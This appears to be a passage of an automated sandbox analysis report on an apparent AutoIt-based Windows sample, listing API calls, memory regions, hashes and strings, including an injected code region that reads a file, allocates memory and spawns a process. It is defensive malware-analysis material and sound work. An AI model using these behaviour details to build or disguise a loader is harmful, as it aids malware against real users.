                • LoadIconW.USER32(000000A4), ref: 00112BC5
                • LoadIconW.USER32(000000A2), ref: 00112BD7
                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00112BEF
                • RegisterClassExW.USER32(?), ref: 00112C40
                  • Part of subcall function 00112CD4: GetSysColorBrush.USER32(0000000F), ref: 00112D07
                  • Part of subcall function 00112CD4: RegisterClassExW.USER32(00000030), ref: 00112D31
                  • Part of subcall function 00112CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00112D42
                  • Part of subcall function 00112CD4: InitCommonControlsEx.COMCTL32(?), ref: 00112D5F
                  • Part of subcall function 00112CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00112D6F
                  • Part of subcall function 00112CD4: LoadIconW.USER32(000000A9), ref: 00112D85
                  • Part of subcall function 00112CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00112D94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: 3e3ebe15430b94209254af83f21daa8e21ea28585f1a1e78e293caaff195ed85
                • Instruction ID: c71e8c28bc0b43ce0832ed4e7e5e82ba7fa2756cf02f39c2d7b291a292df611e
                • Opcode Fuzzy Hash: 3e3ebe15430b94209254af83f21daa8e21ea28585f1a1e78e293caaff195ed85
                • Instruction Fuzzy Hash: 56210974E00358BBDB109FE5EC95AAD7FB4FB48B60F04002AF500AAAA0D7B115C0CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0011316A,?,?), ref: 001131D8
                • KillTimer.USER32(?,00000001,?,?,?,?,?,0011316A,?,?), ref: 00113204
                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00113227
                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0011316A,?,?), ref: 00113232
                • CreatePopupMenu.USER32 ref: 00113246
                • PostQuitMessage.USER32(00000000), ref: 00113267
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                • String ID: TaskbarCreated
                • API String ID: 129472671-2362178303
                • Opcode ID: 99350d263acf1894963008e350d130bea257480bea31d1ce2530c61fdc9e2461
                • Instruction ID: b69d57e631b195b614431435d583b17098e465eabc0d725e219317877d38b76d
                • Opcode Fuzzy Hash: 99350d263acf1894963008e350d130bea257480bea31d1ce2530c61fdc9e2461
                • Instruction Fuzzy Hash: 72412936340244BBDB1D7BB89D4DBFD366AE706354F040135F9329A9A5CB718AC097A1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3936961a086d63eb67fc8db637a498f819c23d08819a495b7055a36232204d4
                • Instruction ID: ddec35c6caae330a909bf7f6078677d65d79d6370b2e166aa71674c35b1cf618
                • Opcode Fuzzy Hash: a3936961a086d63eb67fc8db637a498f819c23d08819a495b7055a36232204d4
                • Instruction Fuzzy Hash: 74C1C174E04249AFDF11DFE8D841BAEBBB4AF19310F144199F915AB3A2C7709982CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01A80965
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                • Instruction ID: 26682879fb1eeee660af7fc2663206f5e6eda03a417fb5751b5a3ef66426609e
                • Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                • Instruction Fuzzy Hash: 5E71FD75A10208EBDF24DFA4CD89FEEBBB5BF48700F148558F605EB280DA749A44CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00112C91
                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00112CB2
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00111CAD,?), ref: 00112CC6
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00111CAD,?), ref: 00112CCF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: d578ad16c12d07c79b0339c409c3a54ac4692404b3bd2f608923e5f6c7e1d190
                • Instruction ID: 24c6c5d5ef01cd21cd2bf075b100f2b1910506961205f24db6e7201fd2d30264
                • Opcode Fuzzy Hash: d578ad16c12d07c79b0339c409c3a54ac4692404b3bd2f608923e5f6c7e1d190
                • Instruction Fuzzy Hash: 93F0DA755402D07AEB311797AC88E7B7EBDE7C7F60F00005AF900AA9A0C67118D1DAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00182C05
                • DeleteFileW.KERNEL32(?), ref: 00182C87
                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00182C9D
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00182CAE
                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00182CC0
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$Delete$Copy
                • String ID:
                • API String ID: 3226157194-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph (basic blocks 1a82440-1a8262e; calls CreateFileW, VirtualAlloc, ReadFile)

                APIs
                  • Part of subcall function 01A82330: Sleep.KERNELBASE(000001F4), ref: 01A82341
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01A8254B
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: CreateFileSleep
                • String ID: J4XZWXL54J4661J
                • API String ID: 2694422964-1089018925
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph (basic blocks 113b1c-113b9b; calls RegOpenKeyExW, RegQueryValueExW, RegCloseKey)

                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00113B0F,SwapMouseButtons,00000004,?), ref: 00113B40
                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00113B0F,SwapMouseButtons,00000004,?), ref: 00113B61
                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00113B0F,SwapMouseButtons,00000004,?), ref: 00113B83
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 3677997916-824357125
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                • Variable must be of type 'Object'., xrefs: 001632B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: Variable must be of type 'Object'.
                • API String ID: 0-109567571
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00130668
                  • Part of subcall function 001332A4: RaiseException.KERNEL32(?,?,?,0013068A,?,001E1444,?,?,?,?,?,?,0013068A,00111129,001D8738,00111129), ref: 00133304
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00130685
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Exception@8Throw$ExceptionRaise
                • String ID: Unknown exception
                • API String ID: 3476068407-410509341
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 01A810A5
                • ExitProcess.KERNEL32(00000000), ref: 01A810C4
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: Process$CreateExit
                • String ID: D
                • API String ID: 126409537-2746444292
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0018302F
                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00183044
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Temp$FileNamePath
                • String ID: aut
                • API String ID: 3285503233-3010740371
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001982F5
                • TerminateProcess.KERNEL32(00000000), ref: 001982FC
                • FreeLibrary.KERNEL32(?,?,?,?), ref: 001984DD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$CurrentFreeLibraryTerminate
                • String ID:
                • API String ID: 146820519-0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00111BF4
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00111BFC
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00111C07
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00111C12
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00111C1A
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00111C22
                  • Part of subcall function 00111B4A: RegisterWindowMessageW.USER32(00000004,?,001112C4), ref: 00111BA2
                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0011136A
                • OleInitialize.OLE32 ref: 00111388
                • CloseHandle.KERNEL32(00000000,00000000), ref: 001524AB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                • String ID:
                • API String ID: 1986988660-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0011556D
                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0011557D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,001485CC,?,001D8CC8,0000000C), ref: 00148704
                • GetLastError.KERNEL32(?,001485CC,?,001D8CC8,0000000C), ref: 0014870E
                • __dosmaperr.LIBCMT ref: 00148739
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                • String ID:
                • API String ID: 490808831-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00182CD4,?,?,?,00000004,00000001), ref: 00182FF2
                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00182CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00183006
                • CloseHandle.KERNEL32(00000000,?,00182CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0018300D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$CloseCreateHandleTime
                • String ID:
                • API String ID: 3397143404-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __Init_thread_footer.LIBCMT ref: 001217F6
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID: CALL
                • API String ID: 1385522511-4196123274
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _wcslen.LIBCMT ref: 00186F6B
                  • Part of subcall function 00114ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EFD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LibraryLoad_wcslen
                • String ID: >>>AUTOIT SCRIPT<<<
                • API String ID: 3312870042-2806939583
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetOpenFileNameW.COMDLG32(?), ref: 00152C8C
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                  • Part of subcall function 00112DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00112DC4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Name$Path$FileFullLongOpen
                • String ID: X
                • API String ID: 779396738-3081909835
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __fread_nolock
                • String ID: EA06
                • API String ID: 2638373210-3962188686
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0011949C,?,00008000), ref: 00115773
                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0011949C,?,00008000), ref: 00154052
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __Init_thread_footer.LIBCMT ref: 0011BB4E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID:
                • API String ID: 1385522511-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 01A808E0: GetFileAttributesW.KERNELBASE(?), ref: 01A808EB
                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01A81235
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: AttributesCreateDirectoryFile
                • String ID:
                • API String ID: 3401506121-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00114E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E9C
                  • Part of subcall function 00114E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00114EAE
